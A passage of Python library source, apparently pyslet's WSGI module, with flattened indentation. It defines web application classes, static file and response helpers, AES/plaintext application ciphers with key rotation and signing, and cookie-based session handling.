if node and node._handler is not None:
return node._handler(context)
if wildcard:
return wildcard(context)
# we didn't find a handler
return self.error_page(context, 404)
except MethodNotAllowed:
return self.error_page(context, 405)
except PageNotFound:
return self.error_page(context, 404)
except PageNotAuthorized:
return self.error_page(context, 403)
except BadRequest:
return self.error_page(context, 400)
except Exception as e:
logger.exception(context.environ['PATH_INFO'])
return self.internal_error(context, e)
def static_page(self, context):
"""Returns a static page
This method can be bound to any path using :meth:`set_method`
and it will look in the :attr:`static_files` directory for that
file. For example, if static_files is "/var/www/html" and the
PATH_INFO variable in the request is "/images/logo.png" then the
path "/var/www/html/images/logo.png" will be returned.
There are significant restrictions on the names of the path
components. Each component *must* match a basic label syntax
(equivalent to the syntax of domain labels in host names) except
the last component which must have a single '.' separating two
valid labels. This conservative syntax is designed to be safe
for passing to file handling functions."""
path = context.environ['PATH_INFO'].split('/')
file_path = self.static_files
if file_path is None:
raise PageNotFound
ext = ''
pleft = len(path)
for p in path:
pleft -= 1
if pleft:
# ignore empty components
if not p:
continue
                # this path component must be a directory; we re-use the
                # ldh-label test from the cookie module to ensure we
                # have a very limited syntax.  Apologies if you wanted
                # fancy URLs.
if not cookie.is_ldh_label(p.encode('ascii')):
raise PageNotFound
file_path = file_path.join(p)
if not file_path.isdir():
raise PageNotFound
elif not p:
# this is the directory form, e.g., /app/docs/ but we
# don't support indexing, we're not Apache
raise PageNotFound
else:
# last component must be a filename.ext form
splitp = p.split('.')
if (len(splitp) != 2 or
not cookie.is_ldh_label(splitp[0].encode('ascii')) or
not cookie.is_ldh_label(splitp[1].encode('ascii'))):
raise PageNotFound
filename = p
ext = splitp[1]
file_path = file_path.join(p)
if not file_path.isfile():
raise PageNotFound
# Now the MIME mapping
ctype = self.content_type.get(ext, None)
if ctype is None:
ctype, encoding = mimetypes.guess_type(filename)
if ctype is not None:
ctype = params.MediaType.from_str(ctype)
if encoding is not None:
context.add_header("Content-Encoding", encoding)
if ctype is None:
ctype = params.APPLICATION_OCTETSTREAM
context.set_status(200)
context.add_header("Content-Type", str(ctype))
return self.file_response(context, file_path)
def file_response(self, context, file_path):
"""Returns a file from the file system
file_path
The system file path of the file to be returned as an
:class:`pyslet.vfs.OSFilePath` instance.
The Content-Length header is set from the file size, the
Last-Modified date is set from the file's st_mtime and the
file's data is returned in chunks of :attr:`MAX_CHUNK` in the
response.
The status is *not* set and must have been set before calling
this method."""
if is_text(file_path):
file_path = OSFilePath(file_path)
finfo = file_path.stat()
context.add_header("Content-Length", str(finfo.st_size))
context.add_header("Last-Modified",
str(params.FullDate.from_unix_time(finfo.st_mtime)))
context.start_response()
bleft = finfo.st_size
with file_path.open('rb') as f:
while bleft:
chunk_size = min(bleft, self.MAX_CHUNK)
chunk = f.read(chunk_size)
if not chunk:
# unexpected EOF while reading
raise RuntimeError("Unexpected EOF")
bleft -= len(chunk)
yield chunk
def html_response(self, context, data):
"""Returns an HTML page
data
A string containing the HTML page data. This may be a
unicode or binary string.
The Content-Type header is set to text/html (with an explicit
charset if data is a unicode string). The status is *not* set and
must have been set before calling this method."""
if is_unicode(data):
data = data.encode('utf-8')
context.add_header("Content-Type", "text/html; charset=utf-8")
else:
context.add_header("Content-Type", "text/html")
# catch the odd case where data is a subclass of str - still ok
# but the default WSGI server uses this stronger test!
if not isinstance(data, bytes):
data = bytes(data)
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def json_response(self, context, data):
"""Returns a JSON response
data
A string containing the JSON data. This may be a unicode or
binary string (encoded with utf-8).
The Content-Type is set to "application/json". The status is
*not* set and must have been set before calling this method."""
if is_unicode(data):
data = data.encode('utf-8')
if not isinstance(data, bytes):
data = bytes(data)
context.add_header("Content-Type", "application/json")
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def text_response(self, context, data):
"""Returns a plain text response
data
A string containing the text data. This may be a unicode or
binary string (encoded with US-ASCII).
The Content-Type is set to "text/plain" (with an explicit
charset if a unicode string is passed). The status is *not* set
and must have been set before calling this method.
Warning: do not encode unicode strings before passing them to
this method as data, if you do you risk problems with non-ASCII
characters as the default charset for text/plain is US-ASCII and
not UTF-8 or ISO8859-1 (latin-1)."""
if is_unicode(data):
data = data.encode('utf-8')
context.add_header("Content-Type", "text/plain; charset=utf-8")
else:
context.add_header("Content-Type", "text/plain")
if not isinstance(data, bytes):
data = bytes(data)
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def redirect_page(self, context, location, code=303):
"""Returns a redirect response
location
A :class:`~pyslet.rfc2396.URI` instance or a string of
octets.
code (303)
The redirect status code. As a reminder the typical codes
are 301 for a permanent redirect, a 302 for a temporary
redirect and a 303 for a temporary redirect following a POST
request. This latter code is useful for implementing the
widely adopted pattern of always redirecting the user after
a successful POST request to prevent browsers prompting for
re-submission and is therefore the default.
This method takes care of setting the status, the Location
header and generating a simple HTML redirection page response
containing a clickable link to *location*."""
data = """<html>
<head><title>Redirect</title></head>
<body>
<p>Please <a href=%s>click here</a> if not redirected automatically</p>
</body></html>""" % xml.escape_char_data7(str(location), True)
context.add_header("Location", str(location))
context.add_header("Content-Type", "text/html")
context.add_header("Content-Length", str(len(data)))
context.set_status(code)
context.start_response()
return [force_bytes(data)]
def error_page(self, context, code=500, msg=None):
"""Generates an error response
code (500)
The status code to send.
msg (None)
An optional plain-text error message. If not given then the
status line is echoed in the body of the response."""
context.set_status(code)
if msg is None:
msg = force_bytes("%i %s" % (code, context.status_message))
context.add_header("Content-Type", "text/plain")
elif is_unicode(msg):
try:
msg = msg.encode('ascii')
context.add_header("Content-Type", "text/plain")
except UnicodeError:
msg = msg.encode('utf-8')
context.add_header("Content-Type", "text/plain; charset=utf-8")
else:
context.add_header("Content-Type", "text/plain")
context.add_header("Content-Length", str(len(msg)))
context.start_response()
return [msg]
def internal_error(self, context, err):
context.set_status(500)
data = force_bytes(
"%i %s\r\n%s" % (context.status, context.status_message, str(err)))
context.add_header("Content-Type", "text/plain")
context.add_header("Content-Length", str(len(data)))
try:
context.start_response()
except Exception:
# log this error and move on as we're already returning a 500
logging.error(
"Error raised by WSGIApp.internal_error: %s",
"".join(traceback.format_exception(*sys.exc_info())))
return [data]
def _run_server_thread(self):
"""Starts the web server running"""
port = self.settings['WSGIApp']['port']
server = make_server('', port, self.call_wrapper)
logger.info("HTTP server on port %i running", port)
# Respond to requests until process is killed
while not self.stop:
server.handle_request()
def run_server(self):
t = threading.Thread(target=self._run_server_thread)
t.setDaemon(True)
t.start()
logger.info("Starting %s server on port %s", self.__class__.__name__,
self.settings['WSGIApp']['port'])
if self.settings['WSGIApp']['interactive']:
# loop around getting commands
while not self.stop:
cmd = input3('cmd: ')
if cmd.lower() == 'stop':
self.stop = True
elif cmd:
try:
                        sys.stdout.write(to_text(eval(cmd)))
except Exception as err:
sys.stdout.write("Error: %s " % to_text(err))
sys.exit()
else:
t.join()
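# A minimal sketch of an application derived from WSGIApp.  It registers
# handlers with set_method following the documented wildcard rules; the class
# name, method names and paths are hypothetical, added only for illustration.
class _ExampleApp(WSGIApp):
    def init_dispatcher(self):
        super(_ExampleApp, self).init_dispatcher()
        # an exact path and a wildcard path, as described in set_method
        self.set_method('/', self.home)
        self.set_method('/static/*', self.static_page)
    def home(self, context):
        # the status must be set before calling html_response
        context.set_status(200)
        return self.html_response(
            context, "<html><body><p>Hello</p></body></html>")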
class WSGIDataApp(WSGIApp):
"""Extends WSGIApp to include a data store
The key 'WSGIDataApp' is reserved for settings defined by this
class in the settings file. The defined settings are:
container (None)
The name of the container to use for the data store. By
default, the default container is used. For future
compatibility you should not depend on using this option.
metadata (None)
URI of the metadata file containing the data schema. The file
is assumed to be relative to the settings_file.
source_type ('sqlite')
The type of data source to create. The default value
        is sqlite.  A value of 'mysql' selects Pyslet's mysqldbds
module instead.
sqlite_path ('database.sqlite3')
URI of the database file. The file is assumed to be relative to
the private_files directory, though an absolute path may be
given.
dbhost ('localhost')
For mysql databases, the hostname to connect to.
    dbname (None)
The name of the database to connect to.
dbuser (None)
The user name to connect to the database with.
dbpassword (None)
The password to use in conjunction with dbuser
keynum ('0')
The identification number of the key to use when storing
encrypted data in the container.
secret (None)
The key corresponding to keynum. The key is read in plain text
from the settings file and must be provided in order to use the
:attr:`app_cipher` for managing encrypted data and secure
hashing. Derived classes could use an alternative mechanism for
reading the key, for example, using the keyring_ python module.
cipher ('aes')
The type of cipher to use. By default :class:`AESAppCipher` is
used which uses AES_ internally with a 256 bit key created by
computing the SHA256 digest of the secret string. The only
other supported value is 'plaintext' which does not provide any
encryption but allows the app_cipher object to be used in cases
where encryption may or may not be used depending on the
deployment environment. For example, it is often useful to turn
off encryption in a development environment!
when (None)
An optional value indicating when the specified secret comes
into operation. The value should be a fully specified time
point in ISO format with timezone offset, such as
'2015-01-01T09:00:00-05:00'. This value is used when the
application is being restarted after a key change, for details
see :meth:`AppCipher.change_key`.
The use of AES requires the PyCrypto module to be installed.
.. _keyring: https://pypi.python.org/pypi/keyring
.. _AES:
http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"""
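    # A sketch of a 'WSGIDataApp' settings section using the keys documented
    # above; the values are illustrative placeholders only:
    #
    #     "WSGIDataApp": {
    #         "metadata": "metadata.xml",
    #         "source_type": "sqlite",
    #         "sqlite_path": "database.sqlite3",
    #         "keynum": 0,
    #         "secret": "generate with wsgi.generate_key()",
    #         "cipher": "aes"
    #     }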
@classmethod
def add_options(cls, parser):
"""Adds the following options:
        -s, --sqlout        print the suggested SQL database schema and
                            then exit.  The setting of --create_tables is
                            ignored.
        --create_tables     create tables in the database
        -m, --memory        use an in-memory SQLite database.  Overrides
                            any source_type and encryption setting
                            values.  Implies --create_tables"""
super(WSGIDataApp, cls).add_options(parser)
parser.add_option(
"-s", "--sqlout", dest="sqlout", action="store_true",
default=False, help="Write out SQL script and quit")
parser.add_option(
"--create_tables", dest="create_tables", action="store_true",
default=False, help="Create tables in the database")
parser.add_option(
"-m", "--memory", dest="in_memory", action="store_true",
default=False, help="Use in-memory sqlite database")
#: the metadata document for the underlying data service
metadata = None
#: the data source object for the underlying data service the type
#: of this object will vary depending on the source type. For
#: SQL-type containers this will be an instance of a class derived
#: from :class:`~pyslet.odata2.sqlds.SQLEntityContainer`
data_source = None
#: the entity container (cf database)
container = None
@classmethod
def setup(cls, options=None, args=None, **kwargs):
"""Adds database initialisation
Loads the :attr:`metadata` document. Creates the
:attr:`data_source` according to the configured :attr:`settings`
(creating the tables only if requested in the command line
options). Finally sets the :attr:`container` to the entity
container for the application.
If the -s or --sqlout option is given in options then the data
source's create table script is output to standard output and
sys.exit(0) is used to terminate the process."""
super(WSGIDataApp, cls).setup(options, args, **kwargs)
settings = cls.settings.setdefault('WSGIDataApp', {})
metadata_file = settings.setdefault('metadata', None)
if metadata_file:
metadata_file = cls.resolve_setup_path(metadata_file)
# load the metadata document for our data layer
cls.metadata = edmx.Document()
with metadata_file.open('rb') as f:
cls.metadata.read(f)
else:
cls.metadata = cls.load_default_metadata()
container_name = settings.setdefault('container', None)
if container_name:
cls.container = cls.metadata.root.DataServices[container_name]
else:
cls.container = cls.metadata.root.DataServices.defaultContainer
if options and options.create_tables:
create_tables = True
else:
create_tables = False
if options and options.in_memory:
source_type = "sqlite"
sqlite_path = ':memory:'
create_tables = True
else:
source_type = settings.setdefault('source_type', 'sqlite')
if source_type == 'sqlite':
# do sqlite settings here
if options and options.sqlout:
# use an in-memory database
sqlite_path = ':memory:'
else:
sqlite_path = settings.setdefault(
'sqlite_path', 'database.sqlite3')
sqlite_path = cls.resolve_setup_path(
sqlite_path, private=True)
elif source_type == 'mysql':
dbhost = settings.setdefault('dbhost', 'localhost')
dbname = settings.setdefault('dbname', None)
dbuser = settings.setdefault('dbuser', None)
dbpassword = settings.setdefault('dbpassword', None)
if source_type == 'sqlite':
from pyslet.odata2.sqlds import SQLiteEntityContainer
# accepts either the string ":memory:" or an OSFilePath
cls.data_source = SQLiteEntityContainer(
file_path=sqlite_path, container=cls.container)
elif source_type == 'mysql':
from pyslet.mysqldbds import MySQLEntityContainer
cls.data_source = MySQLEntityContainer(
host=dbhost, user=dbuser, passwd=dbpassword, db=dbname,
container=cls.container)
else:
raise ValueError("Unknown data source type: %s" % source_type)
if isinstance(cls.data_source, SQLEntityContainer):
if options and options.sqlout:
out = io.StringIO()
cls.data_source.create_all_tables(out=out)
sys.stdout.write(out.getvalue())
sys.exit(0)
elif create_tables:
cls.data_source.create_all_tables()
settings.setdefault('keynum', 0)
if options and options.in_memory and 'AppKeys' in cls.container:
settings.setdefault('secret', generate_key())
settings.setdefault('cipher', 'plaintext')
else:
settings.setdefault('secret', None)
settings.setdefault('cipher', 'aes')
settings.setdefault('when', None)
@classmethod
def load_default_metadata(cls):
raise RuntimeError("No path to metadata")
@classmethod
def new_app_cipher(cls):
"""Creates an :class:`AppCipher` instance
This method is called automatically on construction, you won't
normally need to call it yourself but you may do so, for
example, when writing a script that requires access to data
encrypted by the application.
If there is no 'secret' defined then None is returned.
Reads the values from the settings file and creates an instance
of the appropriate class based on the cipher setting value. The
cipher uses the 'AppKeys' entity set in :attr:`container` to store
information about expired keys. The AppKey entities have the
following three properties:
KeyNum (integer key)
The key identification number
KeyString (string)
The *encrypted* secret, for example::
'1:OBimcmOesYOt021NuPXTP01MoBOCSgviOpIL'
The number before the colon is the key identification number
of the secret used to encrypt the string (and will always be
different from the KeyNum field of course). The data after
the colon is the base-64 encoded encrypted string. The same
            format is used for all data encrypted by
:class:`AppCipher` objects. In this case the secret was the
word 'secret' and the algorithm used is AES.
Expires (DateTime)
The UTC time at which this secret will expire. After this
time a newer key should be used for encrypting data though
this key may of course still be used for decrypting data."""
keynum = cls.settings['WSGIDataApp']['keynum']
secret = cls.settings['WSGIDataApp']['secret']
cipher = cls.settings['WSGIDataApp']['cipher']
when = cls.settings['WSGIDataApp']['when']
if when:
when = iso.TimePoint.from_str(when)
if cipher == 'plaintext':
cipher_class = AppCipher
elif cipher == 'aes':
cipher_class = AESAppCipher
else:
# danger, raise an error
raise RuntimeError("Unknown cipher: %s" % cipher)
if secret:
return cipher_class(keynum, secret.encode('utf-8'),
cls.container['AppKeys'], when)
else:
return None
def __init__(self, **kwargs):
super(WSGIDataApp, self).__init__(**kwargs)
#: the application's cipher, a :class:`AppCipher` instance.
self.app_cipher = self.new_app_cipher()
class PlainTextCipher(object):
def __init__(self, key):
self.key = key
def encrypt(self, data):
return data
def decrypt(self, data):
return data
def hash(self, data):
return sha256(data + self.key).digest()
class AESCipher(object):
def __init__(self, key):
self.key = sha256(key).digest()
def encrypt(self, data):
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CFB, iv)
return iv + cipher.encrypt(data)
def decrypt(self, data):
iv = data[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CFB, iv)
return cipher.decrypt(data[AES.block_size:])
def hash(self, data):
return sha256(data + self.key).digest()
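# A minimal sketch of a round trip through the cipher helpers above.
# AESCipher needs the optional PyCrypto dependency (see got_crypto);
# PlainTextCipher is always available.  Both arguments are binary strings and
# the function name is hypothetical, added only for illustration.
def _example_cipher_roundtrip(secret, data):
    cipher = AESCipher(secret) if got_crypto else PlainTextCipher(secret)
    # in the AES case encrypt prepends the IV and decrypt strips it again
    return cipher.decrypt(cipher.encrypt(data)) == data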
class AppCipher(object):
"""A cipher for encrypting application data
key_num
A key number
key
A binary string containing the application key.
key_set
An entity set used to store previous keys. The entity set must
have an integer key property 'KeyNum' and a string field
'KeyString'. The string field must be large enough to contain
encrypted versions of previous keys.
when (None)
A fully specified :class:`pyslet.iso8601.TimePoint` at which
time the key will become active. If None, the key is active
straight away. Otherwise, the key_set is searched for a key
that is still active and that key is used when encrypting data
until the when time, at which point the given key takes over.
The object wraps an underlying cipher. Strings are encrypted using
the cipher and then encoded using base64. The output is then
prefixed with an ASCII representation of the key number (key_num)
followed by a ':'. For example, if key_num is 7 and the cipher
is plain-text (the default) then encrypt("Hello") results in::
"7:SGVsbG8="
When decrypting a string, the key number is parsed and matched
against the key_num of the key currently in force. If the string
was encrypted with a different key then the key_set is used to look
up that key (which is itself encrypted of course). The process
continues until a key encrypted with key_num is found.
The upshot of this process is that you can change the key associated
with an application. See :meth:`change_key` for details."""
#: the maximum age of a key, which is the number of times the key
#: can be changed before the original key is considered too old to
#: be used for decryption.
MAX_AGE = 100
def __init__(self, key_num, key, key_set, when=None):
self.lock = threading.RLock()
self.key_set = key_set
self.key_num = key_num
self.key = key
self.ciphers = {key_num: self.new_cipher(key)}
if when:
# we need to find a key that hasn't expired
with key_set.open() as keys:
t = edm.EDMValue.from_type(edm.SimpleType.DateTime)
t.set_from_value(time.time())
filter = odata.CommonExpression.from_str(
"Expires gte :t", {'t': t})
keys.set_filter(filter)
# Only interested in keys that haven't expired
old_keys = keys.values()
if not old_keys:
raise RuntimeError("AppCipher: no current key")
old_key = old_keys[0]
self.old_num = old_key['KeyNum'].value
                self.old_key = self.decrypt(old_key['KeyString'].value)
self.old_expires = when.get_unixtime()
self.ciphers[self.old_num] = self.new_cipher(self.old_key)
else:
self.old_num = None
self.old_key = None
self.old_expires = None
def new_cipher(self, key):
"""Returns a new cipher object with the given key
The default implementation creates a plain-text 'cipher' and is
not suitable for secure use of encrypt/decrypt but, with a
sufficiently good key, may still be used for hashing."""
return PlainTextCipher(key)
def change_key(self, key_num, key, when):
"""Changes the key of this application.
key_num
The number given to the new key, must differ from the last
:attr:`MAX_AGE` key numbers.
key
A binary string containing the new application key.
when
A fully specified :class:`pyslet.iso8601.TimePoint` at which
point the new key will come into effect.
Many organizations have a policy of changing keys on a routine
basis, for example, to ensure that people who have had temporary
access to the key only have temporary access to the data it
protects. This method makes it easier to implement such a
policy for applications that use the AppCipher class.
The existing key is encrypted with the new key and a record is
written to the :attr:`key_set` to record the *existing* key
number, the encrypted key string and the *when* time, which is
treated as an expiry time in this context.
This procedure ensures that strings encrypted with an old key
can always be decrypted because the value of the old key can be
looked up. Although it is encrypted, it will be encrypted with
a new(er) key and the procedure can be repeated as necessary
until a key encrypted with the newest key is found.
The key change process then becomes:
1. Start a utility process connected to the application's
entity container using the existing key and then call the
change_key method. Pass a value for *when* that will give
you time to reconfigure all AppCipher clients. Assuming the
key change is planned, a time in hours or even days ahead
can be used.
2. Update or reconfigure all existing applications so that they
will be initialised with the new key and the same value for
*when* next time they are restarted.
3. Restart/refresh all running applications before the change
over time. As this does not need to be done simultaneously,
a load balanced set of application servers can be cycled on
            a schedule to ensure continuous running.
Following a key change the entity container will still contain
data encrypted with old keys and the architecture is such that
compromise of a key is sufficient to read all encrypted data
with that key and all previous keys. Therefore, changing the
key only protects new data.
In situations where policy dictates a key change it might make
sense to add a facility to the application for re-encrypting
data in the data store by going through a
read-decrypt/encrypt-write cycle with each protected data field.
Of course, the old key could still be used to decrypt this
information from archived backups of the data store.
Alternatively, if the protected data is itself subject to change
on a routine basis you may simply rely on the natural turnover
of data in the application. The strategy you choose will depend
on your application.
The :attr:`MAX_AGE` attribute determines the maximum number of
keys that can be in use in the data set simultaneously.
Eventually you will have to update encrypted data in the data
store."""
with self.lock:
self.old_num = self.key_num
self.old_key = self.key
self.old_expires = when.get_unixtime()
# we should already have a cipher for this key
self.key_num = key_num
self.key = key
cipher = self.ciphers[key_num] = self.new_cipher(key)
# we can't use the encrypt method here as we want to force
# use of the new key
old_key_encrypted = "%i:%s" % (
key_num, force_ascii(base64.b64encode(cipher.encrypt(
self.old_key))))
with self.key_set.open() as keys:
e = keys.new_entity()
e.set_key(self.old_num)
e['KeyString'].set_from_value(old_key_encrypted)
e['Expires'].set_from_value(when)
try:
keys.insert_entity(e)
except edm.ConstraintError:
# Presumably this entity already exists, possible race
# condition on change_key - load the entity from the old
# key number to raise KeyError if not
e = keys[self.old_num]
def _get_current_cipher(self):
if self.old_expires:
if time.time() > self.old_expires:
# the old key has finally expired
self.old_num = None
self.old_key = None
self.old_expires = None
else:
# use the old key
return self.old_num, self.ciphers[self.old_num]
return self.key_num, self.ciphers[self.key_num]
def _get_cipher(self, num):
stack = [(num, None, None)]
while stack:
key_num, key_data, cipher_num = stack.pop()
cipher = self.ciphers.get(key_num, None)
if cipher is None:
stack.append((key_num, key_data, cipher_num))
with self.key_set.open() as collection:
try:
e = collection[key_num]
old_key_num, old_key_data = self._split_data(
e['KeyString'].value)
if len(stack) > self.MAX_AGE:
raise KeyError
stack.append((old_key_num, old_key_data, key_num))
except KeyError:
raise RuntimeError("AppCipher: key too old")
elif key_data:
with self.lock:
new_data = cipher.decrypt(key_data)
if cipher_num is not None:
self.ciphers[cipher_num] = self.new_cipher(new_data)
else:
return cipher
def encrypt(self, data):
"""Encrypts data with the current key.
data
A binary input string.
Returns a character string of ASCII characters suitable for
storage."""
with self.lock:
num, cipher = self._get_current_cipher()
return "%i:%s" % (
num, force_ascii(base64.b64encode(cipher.encrypt(data))))
def decrypt(self, data):
"""Decrypts data.
data
A character string containing the encrypted data
Returns a binary string containing the decrypted data."""
key_num, data = self._split_data(data)
cipher = self._get_cipher(key_num)
return cipher.decrypt(data)
def sign(self, message):
"""Signs a message with the current key.
message
A binary message string.
Returns a character string of ASCII characters containing a
signature of the message. It is recommended that character
strings are encoded using UTF-8 before signing."""
with self.lock:
num, cipher = self._get_current_cipher()
salt = os.urandom(4)
hash = cipher.hash(salt + message)
return "%i-%s-%s" % (num, force_ascii(binascii.hexlify(salt)),
force_ascii(binascii.hexlify(hash)))
def check_signature(self, signature, message=None):
"""Checks a signature returned by sign
signature
The ASCII signature to be checked for validity.
message
A binary message string. This is optional; if None, the
message will be extracted from the signature string
(reversing ascii_sign).
On success the method returns the validated message (a binary
string) and on failure it raises ValueError."""
num, salt, hash, smessage = self._split_signature(signature)
try:
num = int(num)
salt = binascii.unhexlify(salt)
hash = binascii.unhexlify(hash)
if smessage:
smessage = unescape_data(smessage)
if message:
# must match exactly!
if message != smessage:
raise ValueError
else:
message = smessage
with self.lock:
cipher = self._get_cipher(num)
if cipher is None:
raise ValueError
if cipher.hash(salt + message) == hash:
return message
else:
raise ValueError
except TypeError:
raise ValueError
def ascii_sign(self, message):
"""Signs a message with the current key
message
A binary message string
The difference between ascii_sign and sign is that ascii_sign
returns the entire message, including the signature, as a
URI-encoded character string suitable for storage and/or
transmission.
The message is %-encoded (as implemented by
:func:`pyslet.rfc2396.escape_data`). You may apply the
corresponding unescape data function to the entire string to get
a binary string that *contains* an exact copy of the original
data."""
return "%s-%s" % (self.sign(message), escape_data(message))
def _split_data(self, data):
data = data.split(':')
if len(data) != 2 or not data[0].isdigit():
raise ValueError
key_num = int(data[0])
try:
data = base64.b64decode(data[1])
except TypeError:
raise ValueError
return key_num, data
def _split_signature(self, signature):
result = []
pos = 0
while True:
if len(result) == 3:
result.append(signature[pos:])
return result
new_pos = signature.find('-', pos)
if new_pos < 0:
result.append(signature[pos:])
while len(result) < 4:
result.append('')
return result
result.append(signature[pos:new_pos])
pos = new_pos + 1
class AESAppCipher(AppCipher):
"""A cipher object that uses AES to encrypt the data
The Pycrypto module must be installed to use this class.
The key is hashed using the SHA256 algorithm to obtain a 32 byte
value for the AES key. The encrypted strings contain random
initialisation vectors so repeated calls won't generate the same
encrypted values. The CFB mode of operation is used."""
def new_cipher(self, key):
return AESCipher(key)
class CookieSession(UnicodeMixin):
"""A session object
Used to persist a small amount of information in the user's browser
making the session stateful. The purpose of the session cookie is
to hold information that does not need to be kept secret from the
user's browser but which can be verified through cookie signing
(outside the scope of this class).
Bear in mind that, when serialised and signed the session data must
fit comfortably into a cookie. Space in cookies is severely
restricted so we only store information in the session that can't be
looked up quickly in an external data store. Although this class
can be extended to add additional information in most cases you
won't need to do this and can instead use the session id as a key
for loading any additional information.
The session can be initialised from an optional character string
which, if provided, is parsed for the session information.
Otherwise the session object is generated with a new randomly
selected ID.
Session lifecycle
When a session is first created it is in an unestablished state. In
this state the session ID is not fixed and the session data may be
exposed in a URL. Once established, the session ID will be fixed
and it must not be exposed in a URL. Strict limits are placed on
the allowable age of an unestablished session and, as an additional
security measure, they are tied to a fixed User-Agent string.
The :class:`SessionApp` class and the associated decorator take care
of most of the complexity and they allow you to create pages that
will only be returned to the user once a session has been
established. At that point you can read/write protected information
indexed using the session id.
If you need to store protected information before the session is
established (only necessary when users might initiate your
application using an authenticated POST request from a third party
system) then you will need to:
1. Create the protected information record and index it using
the unestablished session id.
2. When the session is established you'll need to update the
session id used to index any protected information, thereby
isolating the unestablished session id. This can be done by
overriding :meth:`SessionApp.establish_session`.
Merging Sessions
In some unusual cases a new session may need to be merged into an
existing one (e.g., when cookies are blocked in frames but not when
the user opens a new window from the frame). In cases like this you
may want to override :meth:`SessionApp.merge_session` to reconcile
the two sessions prior to the newer session being discarded."""
def __init__(self, src=None):
if src:
fields = src.split('-')
if len(fields) >= 3:
self.sid = fields[0]
self.established = (fields[1] == '1')
self.last_seen = iso.TimePoint.from_str(fields[2])
else:
raise ValueError("Bad CookieSession: %s" % src)
else:
self.sid = generate_key()
self.established = False
self.last_seen = iso.TimePoint.from_now_utc()
def __unicode__(self):
return "%s-%s-%s" % (self.sid, '1' if self.established else '0',
self.last_seen.get_calendar_string(basic=True))
def establish(self):
if self.established:
raise ValueError("Session already established: %s" % self.sid)
self.sid = generate_key()
self.established = True
return self.sid
def seen_now(self):
self.last_seen = iso.TimePoint.from_now_utc()
def age(self):
return iso.TimePoint.from_now_utc().get_unixtime() - \
self.last_seen.get_unixtime()
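# Hedged round-trip sketch for CookieSession: the serialised form produced
# by to_text() can be parsed back by the constructor:
#
#   s = CookieSession()                 # new, unestablished session
#   src = to_text(s)                    # "<sid>-0-<basic ISO timestamp>"
#   t = CookieSession(src)
#   t.sid == s.sid                      # True; still unestablished
#   t.establish()                       # issues a *new* sid, marks established
#   t.age()                             # seconds since last_seen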
def session_decorator(page_method):
"""Decorates a web method with session handling
page_method
An unbound method with signature: page_method(obj, context)
which performs the WSGI protocol and returns the page
generator.
Our decorator just calls :meth:`SessionContext.session_wrapper`."""
def method_call(self, context):
# There's a smarter way to do this but this is easier to read
# and understand I think...
return self.session_wrapper(context, lambda x: page_method(self, x))
# for more info see:
# http://stackoverflow.com/questions/1015307/python-bind-an-unbound-method
return method_call
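# Hedged usage sketch for session_decorator (class and method names are
# illustrative; the decorated method must be defined on a SessionApp
# subclass so that self.session_wrapper is available):
#
#   class MyApp(SessionApp):
#
#       @session_decorator
#       def home(self, context):
#           # context.session is an established session by this point
#           context.set_status(200)
#           return self.html_response(
#               context, "<html><body>Hello %s</body></html>" %
#               context.session.sid)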
class SessionContext(WSGIContext):
"""Extends the base class with a session object."""
def __init__(self, environ, start_response, canonical_root=None):
WSGIContext.__init__(self, environ, start_response, canonical_root)
#: a session object, or None if no session available
self.session = None
self.session_cookie = None
def start_response(self):
"""Saves the session cookie."""
if self.session_cookie:
# update the browser cookie
self.add_header('Set-Cookie', str(self.session_cookie))
return super(SessionContext, self).start_response()
class SessionApp(WSGIDataApp):
"""Extends WSGIDataApp to include session handling.
These sessions require support for cookies. The SessionApp class
itself uses two cookies purely for session tracking.
The key 'SessionApp' is reserved for settings defined by this
class in the settings file. The defined settings are:
timeout (600)
The number of seconds after which an inactive session will time
out and no longer be accessible to the client.
cookie ('sid')
The name of the session cookie.
cookie_test ('ctest')
The name of the test cookie. This cookie is set with a longer
lifetime and acts both as a test of whether cookies are
supported or not and can double up as an indicator of whether
user consent has been obtained for any extended use of cookies.
It defaults to the value '0', indicating that cookies can be
stored but that no special consent has been obtained.
cookie_test_age (8640000)
The age of the test cookie (in seconds). The default value is
equivalent to 100 days. If you use the test cookie to record
consent to some cookie policy you should ensure that when you
set the value you use a reasonable lifespan.
csrftoken ('csrftoken')
The name of the form field containing the CSRF token"""
_session_timeout = None
_session_cookie = None
_test_cookie = None
@classmethod
def setup(cls, options=None, args=None, **kwargs):
"""Adds database initialisation"""
super(SessionApp, cls).setup(options, args, **kwargs)
settings = cls.settings.setdefault('SessionApp', {})
cls._session_timeout = settings.setdefault('timeout', 600)
cls._session_cookie = force_bytes(
settings.setdefault('cookie', 'sid'))
cls._test_cookie = force_bytes(
settings.setdefault('cookie_test', 'ctest'))
cls.csrf_token = settings.setdefault('csrftoken', 'csrftoken')
settings.setdefault('cookie_test_age', 8640000)
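# Hedged sketch of the corresponding section of a settings file (key names
# are taken from the class docstring above; the surrounding file format is
# whatever WSGIDataApp expects, typically JSON):
#
#   "SessionApp": {
#       "timeout": 600,
#       "cookie": "sid",
#       "cookie_test": "ctest",
#       "cookie_test_age": 8640000,
#       "csrftoken": "csrftoken"
#   }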
@classmethod
def load_default_metadata(cls):
mdir = OSFilePath(__file__).abspath().split()[0]
metadata_file = mdir.join('wsgi_metadata.xml').abspath()
metadata = edmx.Document()
with metadata_file.open('rb') as f:
metadata.read(f)
return metadata
#: The name of our CSRF token
csrf_token = None
#: Extended context class
ContextClass = SessionContext
#: The session class to use, must be (derived from) :class:`Session`
SessionClass = CookieSession
def init_dispatcher(self):
"""Adds pre-defined pages for this application
These pages are mapped to /ctest and /wlaunch. These names are
not currently configurable. See :meth:`ctest` and
:meth:`wlaunch` for more information."""
WSGIApp.init_dispatcher(self)
self.set_method('/ctest', self.ctest)
self.set_method('/wlaunch', self.wlaunch)
def session_wrapper(self, context, page_method):
"""Called by the session_decorator
Uses :meth:`set_session` to ensure the context has a session
object. If this request is a POST then the form is parsed and
the CSRF token checked for validity."""
if context.session is None:
cookies = context.get_cookies()
csrf_match = ""
s_signed = cookies.get(self._session_cookie, b'').decode('ascii')
self.set_session(context)
if context.environ['REQUEST_METHOD'].upper() == 'POST':
# check the CSRF token
if s_signed:
try:
s_msg = self.app_cipher.check_signature(s_signed)
csrf_match = self.SessionClass(
s_msg.decode('utf-8')).sid
